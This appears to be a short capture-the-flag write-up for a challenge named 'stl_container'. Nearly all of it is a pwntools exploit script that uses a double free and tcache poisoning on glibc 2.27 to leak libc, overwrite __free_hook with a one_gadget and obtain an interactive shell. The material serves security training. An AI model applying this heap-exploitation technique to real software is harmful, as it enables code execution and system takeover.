Rating:

**double free** and **tcache poison**

```py
from pwn import *
import sys
import time
context.terminal = ['tmux', 'splitw', '-h']
context.log_level = "info"

filename = './stl_container'
elf = ELF(filename)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')# env 2.27

if len(sys.argv) == 1:
p = process(filename)
else:
p = remote(sys.argv[1], int(sys.argv[2]))

def sla(x, y):
return p.sendlineafter(x, y)

def sa(x, y):
return p.sendafter(x, y)

def add(type, content):
sla('5. exit\n>> ',str(type))
sla('3. show\n>> ', '1')
sa('input data:', content)

def delete(type, index=0):
sla('5. exit\n>> ',str(type))
sla('3. show\n>> ', '2')
if type == 1 or type == 2:
sla('index?\n', str(index))

def show(type, index):
sla('5. exit\n>> ',str(type))
sla('3. show\n>> ', '3')
if type == 1 or type == 2:
sla('index?\n', str(index))
pass

if __name__ == "__main__":
for i in range(1,5):
add(i, 'fish')
add(i, 'fish')

for i in range(3,5):
delete(i)
delete(i)

delete(1, 0)
delete(1, 0)
delete(2, 0)
show(2, 0)
p.recvuntil('data: ')
libc_base = u64(p.recv(6).ljust(8, '\x00'))-0x3ebca0
print('heap: '+hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']
one_gadget = libc_base + 0x4f322
print('free_hook: '+hex(free_hook))
add(1, 'fish')
add(1, 'fish')
add(3, 'fish')
add(2, 'fish')
add(4, 'fish')
add(3, 'fish')
add(4, 'fish')
delete(2, 0)
delete(2, 0)
add(2, p64(free_hook))
add(2, p64(one_gadget))

p.interactive()
```